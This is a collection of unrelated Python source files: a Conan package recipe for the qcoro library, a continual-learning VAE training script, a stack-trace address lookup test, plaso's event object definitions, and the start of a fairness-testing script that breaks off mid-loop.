lv2 = [int(v) for v in v2.split(".")]
min_length = min(len(lv1), len(lv2))
return lv1[:min_length] < lv2[:min_length]
#Special check for clang that can only be linked to libc++
if self.settings.compiler == "clang" and self.settings.compiler.libcxx != "libc++":
raise ConanInvalidConfiguration("imagl requires some C++20 features, which are available in libc++ for clang compiler.")
compiler_version = str(self.settings.compiler.version)
minimum_version = self._compilers_minimum_version.get(str(self.settings.compiler), False)
if not minimum_version:
self.output.warn("qcoro requires C++20. Your compiler is unknown. Assuming it supports C++20.")
elif lazy_lt_semver(compiler_version, minimum_version):
raise ConanInvalidConfiguration("qcoro requires some C++20 features, which your {} {} compiler does not support.".format(str(self.settings.compiler), compiler_version))
else:
print("Your compiler is {} {} and is compatible.".format(str(self.settings.compiler), compiler_version))
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions["QCORO_BUILD_EXAMPLES"] = False
self._cmake.definitions["QCORO_ENABLE_ASAN"] = self.options.asan
self._cmake.definitions["BUILD_TESTING"] = False
self._cmake.definitions["QCORO_WITH_QTDBUS"] = self.options["qt"].with_dbus
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
cmake = self._configure_cmake()
cmake.build()
def package(self):
    """Install build artifacts and license files into the package folder."""
    # qcoro ships its licenses in a LICENSES/ directory (REUSE layout).
    self.copy("*", dst="licenses", src=os.path.join(self._source_subfolder, "LICENSES"))
    self._configure_cmake().install()
    # Drop the CMake config files installed upstream; Conan generates its own.
    cmake_file_masks = (
        "Find*.cmake", "*Config*.cmake", "*-config.cmake", "*Targets*.cmake")
    for mask in cmake_file_masks:
        tools.remove_files_by_mask(self.package_folder, mask)
def package_info(self):
    """Describe the packaged components (Core, Network, optional DBus) for consumers."""
    self.cpp_info.filenames["cmake_find_package"] = "QCoro6"
    self.cpp_info.filenames["cmake_find_package_multi"] = "QCoro6"
    self.cpp_info.set_property("cmake_file_name", "QCoro6")
    self.cpp_info.names["cmake_find_package"] = "QCoro"
    self.cpp_info.names["cmake_find_package_multi"] = "QCoro"

    # QCoro::Core component.
    core = self.cpp_info.components["qcoro-core"]
    core.set_property("cmake_target_name", "QCoro::Core")
    core.names["cmake_find_package"] = "Core"
    core.names["cmake_find_package_multi"] = "Core"
    core.libs = ["QCoro6Core"]
    core.includedirs.append(os.path.join("include", "qcoro6", "qcoro"))
    core.requires = ["qt::qtCore"]
    # Consumers need the QCoroMacros.cmake module pulled into their build.
    macros_path = os.path.join("lib", "cmake", "QCoro6Coro", "QCoroMacros.cmake")
    core.build_modules["cmake_find_package"].append(macros_path)
    core.build_modules["cmake_find_package_multi"].append(macros_path)
    core.builddirs.append(os.path.join("lib", "cmake", "QCoro6Coro"))

    # QCoro::Network component.
    network = self.cpp_info.components["qcoro-network"]
    network.set_property("cmake_target_name", "QCoro::Network")
    network.names["cmake_find_package"] = "Network"
    network.names["cmake_find_package_multi"] = "Network"
    network.libs = ["QCoro6Network"]
    network.requires = ["qt::qtNetwork"]

    # QCoro::DBus component, only when the qt dependency was built with DBus.
    if self.options["qt"].with_dbus:
        dbus = self.cpp_info.components["qcoro-dbus"]
        dbus.set_property("cmake_target_name", "QCoro::DBus")
        dbus.names["cmake_find_package"] = "DBus"
        dbus.names["cmake_find_package_multi"] = "DBus"
        # NOTE(review): the other components use a "QCoro6" prefix; confirm
        # whether the installed library is QCoroDBus or QCoro6DBus.
        dbus.libs = ["QCoroDBus"]
        # BUG FIX: this previously assigned qt::qtDBus to the "qcoro-core"
        # component, clobbering its qt::qtCore requirement.
        dbus.requires = ["qt::qtDBus"]
|
import numpy as np
import tensorflow as tf
import sys, os
sys.path.extend(['alg/', 'models/'])
from visualisation import plot_images
from encoder_no_shared import encoder, recon
from utils import init_variables, save_params, load_params, load_data
from eval_test_ll import construct_eval_func
# Default hyper-parameters; passed explicitly into main() below.
dimZ = 50        # latent code dimensionality
dimH = 500       # hidden layer width of encoder/generator
n_channel = 128  # channel count forwarded to the dataset config()
batch_size = 50
lr = 1e-4        # learning rate passed to fit()
K_mc = 10        # number of Monte Carlo samples (used by the 'onlinevi' method)
checkpoint = -1  # checkpoint index to restore; negative = train from scratch
def main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd):
    """Train a VAE sequentially over a series of tasks with a continual-learning method.

    Args:
        data_name: 'mnist' or 'notmnist'; selects the dataset loader and config.
        method: one of 'onlinevi', 'ewc', 'noreg', 'laplace', 'si'; selects
            which regulariser/optimizer modules are imported below.
        dimZ, dimH: latent and hidden dimensionality of the VAE.
        n_channel: channel parameter forwarded to the dataset config().
        batch_size: minibatch size used for the EWC/Laplace Fisher estimates.
        K_mc: number of MC samples (only used by 'onlinevi').
        checkpoint: checkpoint index to restore; negative trains from scratch.
        lbd: regularisation strength for 'ewc'/'laplace'/'si'.

    Side effects: creates save/, figs/ and results/ directories, saves
    parameters after every task and pickles the per-task validation-ll
    results at the end.
    """
    # set up dataset specific stuff
    from config import config
    labels, n_iter, dimX, shape_high, ll = config(data_name, n_channel)

    if data_name == 'mnist':
        from mnist import load_mnist
    if data_name == 'notmnist':
        from notmnist import load_notmnist

    # Import the method-specific generator/optimizer functionalities.
    if method == 'onlinevi':
        from bayesian_generator import generator_head, generator_shared, \
            generator, construct_gen
        from onlinevi import construct_optimizer, init_shared_prior, \
            update_shared_prior, update_q_sigma
    if method in ['ewc', 'noreg', 'laplace', 'si']:
        from generator import generator_head, generator_shared, generator, construct_gen
    if method in ['ewc', 'noreg']:
        from vae_ewc import construct_optimizer, lowerbound
    if method == 'ewc': from vae_ewc import update_ewc_loss, compute_fisher
    if method == 'laplace':
        from vae_laplace import construct_optimizer, lowerbound
        from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum
    if method == 'si':
        from vae_si import construct_optimizer, lowerbound, update_si_reg

    # then define model
    n_layers_shared = 2
    batch_size_ph = tf.placeholder(tf.int32, shape=(), name='batch_size')
    # The generator trunk is shared across all tasks; only the heads differ.
    dec_shared = generator_shared(dimX, dimH, n_layers_shared, 'sigmoid', 'gen')

    # initialise sessions
    # NOTE: this local rebinds the name 'config', shadowing the config()
    # function imported above (no longer needed at this point).
    config = tf.ConfigProto()
    config.gpu_options.allow_growth = True
    sess = tf.Session(config=config)
    # Build a run identifier encoding method and its hyper-parameters.
    string = method
    if method in ['ewc', 'laplace', 'si']:
        string = string + '_lbd%.1f' % lbd
    if method == 'onlinevi' and K_mc > 1:
        string = string + '_K%d' % K_mc
    path_name = data_name + '_%s/' % string
    if not os.path.isdir('save/'):
        os.mkdir('save/')
    if not os.path.isdir('save/'+path_name):
        os.mkdir('save/'+path_name)
        print('create path save/' + path_name)
    filename = 'save/' + path_name + 'checkpoint'
    if checkpoint < 0:
        print('training from scratch')
        old_var_list = init_variables(sess)
    else:
        load_params(sess, filename, checkpoint)
    # Next checkpoint index to be written (so -1 -> 0 on a fresh run).
    checkpoint += 1

    # visualise the samples
    N_gen = 10**2
    path = 'figs/' + path_name
    if not os.path.isdir('figs/'):
        os.mkdir('figs/')
    if not os.path.isdir(path):
        os.mkdir(path)
        print('create path ' + path)

    X_ph = tf.placeholder(tf.float32, shape=(batch_size, dimX), name = 'x_ph')

    # now start fitting
    N_task = len(labels)
    gen_ops = []
    X_valid_list = []
    X_test_list = []
    eval_func_list = []
    result_list = []
    # Method-specific regulariser state, updated after each task below.
    if method == 'onlinevi':
        shared_prior_params = init_shared_prior()
    if method in ['ewc', 'noreg']:
        ewc_loss = 0.0
    if method == 'laplace':
        F_accum = init_fisher_accum()
        laplace_loss = 0.0
    if method == 'si':
        old_params_shared = None
        si_reg = None
    n_layers_head = 2
    n_layers_enc = n_layers_shared + n_layers_head - 1
    for task in range(1, N_task+1):
        # first load data
        if data_name == 'mnist':
            X_train, X_test, _, _ = load_mnist(digits = labels[task-1], conv = False)
        if data_name == 'notmnist':
            X_train, X_test, _, _ = load_notmnist(digits = labels[task-1], conv = False)
        # 90/10 train/validation split.
        N_train = int(X_train.shape[0] * 0.9)
        X_valid_list.append(X_train[N_train:])
        X_train = X_train[:N_train]
        X_test_list.append(X_test)

        # define the head net and the generator ops
        dec = generator(generator_head(dimZ, dimH, n_layers_head, 'gen_%d' % task), dec_shared)
        enc = encoder(dimX, dimH, dimZ, n_layers_enc, 'enc_%d' % task)
        gen_ops.append(construct_gen(dec, dimZ, sampling=False)(N_gen))
        print('construct eval function...')
        eval_func_list.append(construct_eval_func(X_ph, enc, dec, ll, \
                              batch_size_ph, K = 100, sample_W = False))

        # then construct loss func and fit func
        print('construct fit function...')
        if method == 'onlinevi':
            fit = construct_optimizer(X_ph, enc, dec, ll, X_train.shape[0], batch_size_ph, \
                                      shared_prior_params, task, K_mc)
        if method in ['ewc', 'noreg']:
            bound = lowerbound(X_ph, enc, dec, ll)
            fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], ewc_loss)
            if method == 'ewc':
                fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
        if method == 'laplace':
            bound = lowerbound(X_ph, enc, dec, ll)
            fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], laplace_loss)
            fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
        if method == 'si':
            bound = lowerbound(X_ph, enc, dec, ll)
            fit, shared_var_list = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0],
                                                       si_reg, old_params_shared, lbd)
            # On the first task there is no previous parameter snapshot yet.
            if old_params_shared is None:
                old_params_shared = sess.run(shared_var_list)

        # initialise all the uninitialised stuff
        old_var_list = init_variables(sess, old_var_list)

        # start training for each task
        if method == 'si':
            new_params_shared, w_params_shared = fit(sess, X_train, n_iter, lr)
        else:
            fit(sess, X_train, n_iter, lr)

        # plot samples from every task's generator seen so far
        x_gen_list = sess.run(gen_ops, feed_dict={batch_size_ph: N_gen})
        for i in range(len(x_gen_list)):
            plot_images(x_gen_list[i], shape_high, path, \
                        data_name+'_gen_task%d_%d' % (task, i+1))

        # Collect one sample per task into a 10-row panel for the summary plot.
        x_list = [x_gen_list[i][:1] for i in range(len(x_gen_list))]
        x_list = np.concatenate(x_list, 0)
        tmp = np.zeros([10, dimX])
        tmp[:task] = x_list
        if task == 1:
            x_gen_all = tmp
        else:
            x_gen_all = np.concatenate([x_gen_all, tmp], 0)

        # print test-ll on all tasks (evaluated on the validation splits)
        tmp_list = []
        for i in range(len(eval_func_list)):
            print('task %d' % (i+1), end=' ')
            test_ll = eval_func_list[i](sess, X_valid_list[i])
            tmp_list.append(test_ll)
        result_list.append(tmp_list)

        # save param values
        save_params(sess, filename, checkpoint)
        checkpoint += 1

        # update regularisers/priors
        if method == 'ewc':
            # update EWC loss
            print('update ewc loss...')
            X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
            ewc_loss = update_ewc_loss(sess, ewc_loss, var_list, fisher, lbd, X_batch)
        if method == 'laplace':
            # update Laplace loss
            print('update laplace loss...')
            X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
            laplace_loss, F_accum = update_laplace_loss(sess, F_accum, var_list, fisher, lbd, X_batch)
        if method == 'onlinevi':
            # update prior
            print('update prior...')
            shared_prior_params = update_shared_prior(sess, shared_prior_params)
            # reset the variance of q
            update_q_sigma(sess)
        if method == 'si':
            # update SI importance weights (big omega matrices)
            print('update SI big omega matrices...')
            si_reg, _ = update_si_reg(sess, si_reg, new_params_shared, \
                                      old_params_shared, w_params_shared)
            old_params_shared = new_params_shared

    plot_images(x_gen_all, shape_high, path, data_name+'_gen_all')

    for i in range(len(result_list)):
        print(result_list[i])

    # save results
    if not os.path.isdir("results/"):
        os.mkdir("results/")
    fname = 'results/' + data_name + '_%s.pkl' % string
    import pickle
    with open(fname, 'wb') as f:
        pickle.dump(result_list, f)
    print('test-ll results saved in', fname)
if __name__ == '__main__':
    # Usage: python <script> <data_name> <method> [lbd]
    # lbd (regularisation strength) is only read for the regularised methods.
    data_name, method = str(sys.argv[1]), str(sys.argv[2])
    assert method in ['noreg', 'laplace', 'ewc', 'si', 'onlinevi']
    lbd = 1.0 if method == 'onlinevi' else float(sys.argv[3])
    main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd)
|
#! /usr/bin/env python3.3
# Virtual memory analysis scripts.
# Developed 2012-2014 by <NAME>, <EMAIL>
# Copyright (c) 2012-2014 <NAME> and University of Washington
from util.pjh_utils import * #this is going to fail if not in top-level dir...
from ip_to_fn import *
# Main: manual smoke-test driver for ip_to_fn_converter. Hard-coded paths
# and addresses must be updated to match a local trace run (see below).
if __name__ == '__main__':
    tag = 'main'

    # The way to use this test file is to first do a test application run
    # (i.e. of hello-world) with userstacktraces active. Then, look at
    # the maps files from the run to see where the r-xpf vmas for
    # hello-world and libc started in the address space, and fill in
    # the hw_addr and libc_addr below. Then, look at an actual stacktrace
    # that's printed (see example below) and fill in the test 'addr'
    # values below, and check that the output of this script matches
    # what you see when you run "objdump -d " on hello-world and libc.
    helloworld = '/home/pjh/research/virtual/apps/test-programs/hello-world'
    # int(..., 16) accepts the '0x' prefix; this is the binary's load address.
    hw_addr = int('0x00400000', 16)

    #libc = '/lib/x86_64-linux-gnu/libc-2.15.so'
    libc = '/home/pjh/research/virtual/glibc-testinstall/lib/libc-2.17.so'
    libc_addr = int('0x7fdfb405d000', 16)

    ip_to_fn = ip_to_fn_converter()

    '''
    # An actual userstacktrace: line 2337 in
    # measurement_results/20130918-11.28.18/manual-app-1/trace-events-full
    hello-world-6948 [001] .... 74981.051938: <user stack trace>
    [001] => <00007fdfb41472fa>
    [001] => <00007fdfb40d722c>
    [001] => <00007fdfb40d6688>
    [001] => <00007fdfb40d5815>
    [001] => <00007fdfb40a427f>
    [001] => <00007fdfb40aee08>
    [001] => <000000000040081c>
    [001] => <00000000004008f5>
    [001] => <00007fdfb407e995>
    [001] => <00000000004006d9>
    libc-2.17.so start-addr: 0x7fdfb405d000
    hello-world start-addr: 0x000000400000
    Expected output (bottom of stack towards top):
    lookup 0x4006d9 in helloworld: _start
    lookup 0x7fdfb407e995 in libc: __libc_start_main
    lookup 0x4008f5 in helloworld: main
    lookup 0x40081c in helloworld: procedure
    lookup 0x7fdfb40aee08 in libc: __printf
    ...
    Makes sense, woooooooo!
    '''
    # Resolve the sample trace addresses (bottom of stack towards top) and
    # print each mapping; compare against the expected output above.
    addr = int('00000000004006d9', 16)
    fn = ip_to_fn.lookup(helloworld, addr, hw_addr)
    print("lookup {} in helloworld: {}".format(hex(addr), fn))
    addr = int('00007fdfb407e995', 16)
    fn = ip_to_fn.lookup(libc, addr, libc_addr)
    print("lookup {} in libc: {}".format(hex(addr), fn))
    addr = int('00000000004008f5', 16)
    fn = ip_to_fn.lookup(helloworld, addr, hw_addr)
    print("lookup {} in helloworld: {}".format(hex(addr), fn))
    addr = int('000000000040081c', 16)
    fn = ip_to_fn.lookup(helloworld, addr, hw_addr)
    print("lookup {} in helloworld: {}".format(hex(addr), fn))
    addr = int('00007fdfb40aee08', 16)
    fn = ip_to_fn.lookup(libc, addr, libc_addr)
    print("lookup {} in libc: {}".format(hex(addr), fn))

    ip_to_fn.close()
    sys.exit(0)
else:
    print('Must run stand-alone')
    # NOTE(review): usage() and sys are presumably provided by the
    # star-imports at the top of the file -- verify.
    usage()
    sys.exit(1)
|
<filename>plaso/lib/event.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2012 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The core object definitions, e.g. the event object."""
import collections
import logging
import uuid
from plaso.formatters import manager as formatters_manager
from plaso.lib import timelib
from plaso.lib import utils
import pytz
class AnalysisReport(object):
  """Class that defines an analysis report."""

  def __init__(self):
    """Initializes the analysis report."""
    super(AnalysisReport, self).__init__()
    self._anomalies = []
    self._tags = []

  def __unicode__(self):
    """Return an unicode string representation of the report."""
    return self.GetString()

  def GetAnomalies(self):
    """Retrieves the list of anomalies that are attached to the report."""
    return self._anomalies

  def GetString(self):
    """Return an unicode string representation of the report."""
    # TODO: Make this a more complete function that includes images
    # and the option of saving as a full fledged HTML document.
    lines = [u'Report generated from: {0:s}'.format(self.plugin_name)]

    time_compiled = getattr(self, 'time_compiled', 0)
    if time_compiled:
      time_compiled = timelib.Timestamp.CopyToIsoFormat(time_compiled)
      lines.append(u'Generated on: {0:s}'.format(time_compiled))

    filter_string = getattr(self, 'filter_string', '')
    if filter_string:
      lines.append(u'Filter String: {0:s}'.format(filter_string))

    lines.append(u'')
    lines.append(u'Report text:')
    lines.append(self.text)

    return u'\n'.join(lines)

  def GetTags(self):
    """Retrieves the list of event tags that are attached to the report."""
    return self._tags

  # TODO: rename text to body?
  def SetText(self, lines_of_text):
    """Sets the text based on a list of lines of text.

    Args:
      lines_of_text: a list containing lines of text.
    """
    # The appended empty string makes sure the joined text ends with a
    # trailing new line as well.
    lines_of_text.append(u'')
    self.text = u'\n'.join(lines_of_text)
# TODO: Re-design the event object to make it lighter, perhaps template
# based. The current design is too slow and needs to be improved.
class EventObject(object):
  """An event object is the main datastore for an event in plaso.

  The framework is designed to parse files and create an event
  from every single record, line or key extracted from the file.

  An EventObject is the main data storage for an event in plaso.

  This class defines the high level interface of EventObject.
  Before creating an EventObject a class needs to be implemented
  that inherits from EventObject and implements the functions in it.

  The EventObject is then used by output processing for saving
  in other forms, such as a protobuff, AFF4 container, CSV files,
  databases, etc.

  The goal of the EventObject is to provide a easily extensible
  data storage of each events internally in the tool.

  The main EventObject only exposes those functions that the
  implementations need to implement. The functions that are needed
  simply provide information about the event, or describe the
  attributes that are necessary. How they are assembled is totally
  up to the implementation.

  All required attributes of the EventObject are passed to the
  constructor of the object while the optional ones are set
  using the method SetValue(attribute, value).
  """
  # This is a convenience variable to define event object as
  # simple value objects. Its runtime equivalent data_type
  # should be used in code logic.
  DATA_TYPE = ''

  # This is a reserved variable just used for comparison operation and defines
  # attributes that should not be used during evaluation of whether two
  # EventObjects are the same.
  COMPARE_EXCLUDE = frozenset([
      'timestamp', 'inode', 'pathspec', 'filename', 'uuid',
      'data_type', 'display_name', 'store_number', 'store_index', 'tag'])

  def __init__(self):
    """Initializes the event object with a fresh unique identifier."""
    # NOTE: uuid4().get_hex() is Python 2 only API (use .hex on Python 3).
    self.uuid = uuid.uuid4().get_hex()
    if self.DATA_TYPE:
      self.data_type = self.DATA_TYPE

  def EqualityString(self):
    """Return a string describing the EventObject in terms of object equality.

    The details of this function must match the logic of __eq__. EqualityStrings
    of two event objects should be the same if and only if the EventObjects are
    equal as described in __eq__.

    Returns:
      String: will match another EventObject's Equality String if and only if
              the EventObjects are equal
    """
    fields = sorted(list(self.GetAttributes().difference(self.COMPARE_EXCLUDE)))

    # TODO: Review this (after 1.1.0 release). Is there a better/more clean
    # method of removing the timestamp description field out of the fields list?
    parser = getattr(self, 'parser', u'')
    if parser == u'filestat':
      # We don't want to compare the timestamp description field when comparing
      # filestat events. This is done to be able to join together FILE events
      # that have the same timestamp, yet different description field (as in an
      # event that has for instance the same timestamp for mtime and atime,
      # joining it together into a single event).
      try:
        timestamp_desc_index = fields.index('timestamp_desc')
        del fields[timestamp_desc_index]
      except ValueError:
        pass

    basic = [self.timestamp, self.data_type]
    attributes = []
    for attribute in fields:
      value = getattr(self, attribute)
      # Normalize unordered containers so the resulting string is
      # deterministic.
      if type(value) is dict:
        attributes.append(sorted(value.items()))
      elif type(value) is set:
        attributes.append(sorted(list(value)))
      else:
        attributes.append(value)

    # Interleave field names with their values: [name1, value1, name2, ...].
    identity = basic + [x for pair in zip(fields, attributes) for x in pair]

    if parser == 'filestat':
      inode = getattr(self, 'inode', 'a')
      if inode == 'a':
        # No inode available: substitute a random value so that two
        # inode-less filestat events never share an equality string.
        inode = '_' + str(uuid.uuid4())
      identity.append('inode')
      identity.append(inode)

    return u'|'.join(map(unicode, identity))

  def __eq__(self, event_object):
    """Return a boolean indicating if two EventObject are considered equal.

    Compares two EventObject objects together and evaluates if they are
    the same or close enough to be considered to represent the same event.

    For two EventObject objects to be considered the same they need to
    have the following conditions:
    + Have the same timestamp.
    + Have the same data_type value.
    + Have the same set of attributes.
    + Compare all other attributes than those that are reserved, and
      they all have to match.

    The following attributes are considered to be 'reserved' and not used
    for the comparison, so they may be different yet the EventObject is still
    considered to be equal:
    + inode
    + pathspec
    + filename
    + display_name
    + store_number
    + store_index

    Args:
      event_object: The EventObject that is being compared to this one.

    Returns:
      True: if both EventObjects are considered equal, otherwise False.
    """
    # Note: if this method changes, the above EqualityString method MUST be
    # updated as well
    if not isinstance(event_object, EventObject):
      return False

    if self.timestamp != event_object.timestamp:
      return False

    if self.data_type != event_object.data_type:
      return False

    attributes = self.GetAttributes()
    if attributes != event_object.GetAttributes():
      return False

    # Here we have to deal with "near" duplicates, so not all attributes
    # should be compared.
    for attribute in attributes.difference(self.COMPARE_EXCLUDE):
      if getattr(self, attribute) != getattr(event_object, attribute):
        return False

    # If we are dealing with the stat parser the inode number is the one
    # attribute that really matters, unlike others.
    if 'filestat' in getattr(self, 'parser', ''):
      return utils.GetUnicodeString(getattr(
          self, 'inode', 'a')) == utils.GetUnicodeString(getattr(
              event_object, 'inode', 'b'))

    return True

  def GetAttributes(self):
    """Return a set of all defined attribute names."""
    return set(self.__dict__.keys())

  def GetValues(self):
    """Returns a dictionary of all defined attributes and their values."""
    values = {}
    for attribute_name in self.GetAttributes():
      values[attribute_name] = getattr(self, attribute_name)
    return values

  def GetString(self):
    """Return a unicode string representation of an EventObject."""
    return unicode(self)

  def __str__(self):
    """Return a string object of the EventObject."""
    # Python 2: delegate to __unicode__ and encode as UTF-8 bytes.
    return unicode(self).encode('utf-8')

  def __unicode__(self):
    """Print a human readable string from the EventObject."""
    out_write = []

    out_write.append(u'+-' * 40)
    out_write.append(u'[Timestamp]:\n {0:s}'.format(
        timelib.Timestamp.CopyToIsoFormat(self.timestamp)))
    out_write.append(u'\n[Message Strings]:')

    # TODO: move formatting testing to a formatters (manager) test.
    event_formatter = formatters_manager.EventFormatterManager.GetFormatter(
        self)
    if not event_formatter:
      out_write.append(u'None')
    else:
      msg, msg_short = event_formatter.GetMessages(self)
      source_short, source_long = event_formatter.GetSources(self)
      out_write.append(u'{2:>7}: {0}\n{3:>7}: {1}\n'.format(
          utils.GetUnicodeString(msg_short), utils.GetUnicodeString(msg),
          'Short', 'Long'))
      out_write.append(u'{2:>7}: {0}\n{3:>7}: {1}\n'.format(
          utils.GetUnicodeString(source_short),
          utils.GetUnicodeString(source_long), 'Source Short', 'Source Long'))

    if hasattr(self, 'pathspec'):
      pathspec_string = self.pathspec.comparable
      out_write.append(u'[Pathspec]:\n {0:s}\n'.format(
          pathspec_string.replace('\n', '\n ')))

    out_additional = []
    out_write.append(u'[Reserved attributes]:')
    out_additional.append(u'[Additional attributes]:')

    # Split the attributes into reserved ones (printed first) and the rest;
    # pathspec is skipped since it is printed separately above.
    for attr_key, attr_value in sorted(self.GetValues().items()):
      if attr_key in utils.RESERVED_VARIABLES:
        if attr_key == 'pathspec':
          continue
        else:
          out_write.append(u' {{{key}}} {value}'.format(
              key=attr_key, value=attr_value))
      else:
        out_additional.append(u' {{{key}}} {value}'.format(
            key=attr_key, value=attr_value))

    out_write.append(u'\n')
    out_additional.append(u'')

    part_1 = u'\n'.join(out_write)
    part_2 = u'\n'.join(out_additional)

    return part_1 + part_2
class EventTag(object):
  """A native Python object for the EventTagging protobuf.

  The EventTag object should have the following attributes:
  (optional attributes surrounded with brackets)
  + store_number: An integer, pointing to the store the EventObject is.
  + store_index: An index into the store where the EventObject is.
  + event_uuid: An UUID value of the event this tag belongs to.
  + [comment]: An arbitrary string containing comments about the event.
  + [color]: A string containing color information.
  + [tags]: A list of strings with tags, eg: 'Malware', 'Entry Point'.

  The tag either needs to have an event_uuid defined or both the store_number
  and store_index to be valid (not both, if both defined the store_number and
  store_index will be used).
  """
  # TODO: Enable __slots__ once we tested the first round of changes.

  @property
  def string_key(self):
    """Return a string index key for this tag."""
    if not self.IsValidForSerialization():
      return ''
    event_uuid = getattr(self, 'event_uuid', None)
    return event_uuid if event_uuid else u'{}:{}'.format(
        self.store_number, self.store_index)

  def GetString(self):
    """Retrieves a string representation of the event."""
    lines = [u'-' * 50]
    if getattr(self, 'store_number', 0):
      lines.append(u'{0:>7}:\n\tNumber: {1}\n\tIndex: {2}'.format(
          'Store', self.store_number, self.store_index))
    else:
      lines.append(u'{0:>7}:\n\tUUID: {1}'.format('Store', self.event_uuid))
    # Optional simple attributes, printed in a fixed order when present.
    for label, attribute in (('Comment', 'comment'), ('Color', 'color')):
      if hasattr(self, attribute):
        lines.append(u'{:>7}: {}'.format(label, getattr(self, attribute)))
    if hasattr(self, 'tags'):
      lines.append(u'{:>7}: {}'.format('Tags', u','.join(self.tags)))
    return u'\n'.join(lines)

  def IsValidForSerialization(self):
    """Return whether or not this is a valid tag object."""
    if getattr(self, 'event_uuid', None):
      return True
    has_store_number = getattr(self, 'store_number', 0)
    return bool(has_store_number and getattr(self, 'store_index', -1) >= 0)
class PreprocessObject(object):
  """Object used to store all information gained from preprocessing."""

  def __init__(self):
    """Initializes the preprocess object."""
    super(PreprocessObject, self).__init__()
    self._user_ids_to_names = None
    # Default to UTC until SetTimezone() is called.
    self.zone = pytz.UTC

  def GetUserMappings(self):
    """Returns a dictionary objects mapping SIDs or UIDs to usernames."""
    if self._user_ids_to_names is None:
      self._user_ids_to_names = {}
    elif self._user_ids_to_names:
      # Already built on a previous call.
      return self._user_ids_to_names

    # Lazily build the mapping from the 'users' preprocessing attribute.
    for user_entry in getattr(self, 'users', []):
      if 'sid' in user_entry:
        identifier = user_entry.get('sid', u'')
      elif 'uid' in user_entry:
        identifier = user_entry.get('uid', u'')
      else:
        identifier = u''
      if identifier:
        self._user_ids_to_names[identifier] = user_entry.get(
            'name', identifier)
    return self._user_ids_to_names

  def GetUsernameById(self, user_id):
    """Returns a username for a specific user identifier.

    Args:
      user_id: The user identifier, either a SID or UID.

    Returns:
      If available the user name for the identifier, otherwise the string '-'.
    """
    return self.GetUserMappings().get(user_id, '-')

  # TODO: change to property with getter and setter.
  def SetTimezone(self, timezone_identifier):
    """Sets the timezone.

    Args:
      timezone_identifier: string containing the identifier of the timezone,
                           e.g. 'UTC' or 'Iceland'.
    """
    try:
      self.zone = pytz.timezone(timezone_identifier)
    except pytz.UnknownTimeZoneError as exception:
      # Keep the previous zone and only log the failure.
      logging.warning(
          u'Unable to set timezone: {0:s} with error: {1:s}.'.format(
              timezone_identifier, exception))

  def SetCollectionInformationValues(self, dict_object):
    """Sets the collection information values.

    Args:
      dict_object: dictionary object containing the collection information
                   values.
    """
    self.collection_information = dict(dict_object)
    if 'configure_zone' in self.collection_information:
      self.collection_information['configure_zone'] = pytz.timezone(
          self.collection_information['configure_zone'])

  def SetCounterValues(self, dict_object):
    """Sets the counter values.

    Args:
      dict_object: dictionary object containing the counter values.
    """
    # Note: iteritems() is Python 2 only API.
    self.counter = collections.Counter()
    for counter_key, counter_value in dict_object.iteritems():
      self.counter[counter_key] = counter_value

  def SetPluginCounterValues(self, dict_object):
    """Sets the plugin counter values.

    Args:
      dict_object: dictionary object containing the plugin counter values.
    """
    self.plugin_counter = collections.Counter()
    for counter_key, counter_value in dict_object.iteritems():
      self.plugin_counter[counter_key] = counter_value
# Named tuple that defines a parse error.
#
# Attributes:
#   name: The parser or plugin name.
#   description: The description of the error.
#   path_spec: Optional path specification of the file entry (instance of
#              dfvfs.PathSpec). The default is None.
ParseError = collections.namedtuple(
    'ParseError', ['name', 'description', 'path_spec'])
|
'''
Group discrimination testing for Subject System A
Inputs :
argv[1] : Train file
argv[2] : Sensitive argument
argv[3] : Argument to test discrimination against
For argv[2] and argv[3] : 8 means race and 9 means gender
'''
from __future__ import division
from random import seed, shuffle
import random
import math
import os
from collections import defaultdict
from sklearn import svm
import os,sys
import urllib2
sys.path.insert(0, './fair_classification/') # the code for fair classification is in this directory
import utils as ut
import numpy as np
import itertools
import loss_funcs as lf # loss funcs that can be optimized subject to various constraints
import commands
# CLI configuration: argv[1] = training data file, argv[2] = sensitive
# attribute index (8 = race, 9 = gender), argv[3] = attribute index to test
# discrimination against.
sens_arg = int(sys.argv[2])
fixval = int(sys.argv[3])

# Set printsuite to 0 to not print the test suite.
printsuite = 1
# Minimum number of inputs to start applying the confidence check optimization.
minInp = 50000
# Maximum number of inputs to test against.
max_inp=50000
# Training file.
trainfile = sys.argv[1]
# Output file for the test suite.
outputfile = "../Suites/freshA"+str(sens_arg)+str(fixval)
random.seed(12)

# Dataset-specific settings: sensitive attribute name and covariance
# threshold(s) passed to the fair-classification trainer below.
if(sens_arg== 9):
    name = 'sex'
    cov=0
else:
    name = 'race'
    cov = [0.2,0.2,0.2,0.2,0.2,0.2]

X=[]
Y=[]
i=0
sensitive = {};
sens = []
# option controls how predictions are obtained inside check_ratio() below
# (model dot-product vs. shelling out to Atestcensus.py).
option=4

# Load the training data; the first line is treated as a header and skipped.
with open(trainfile, "r") as ins:
    for line in ins:
        line = line.strip()
        line1 = line.split(',')
        if(i==0):
            i+=1
            continue
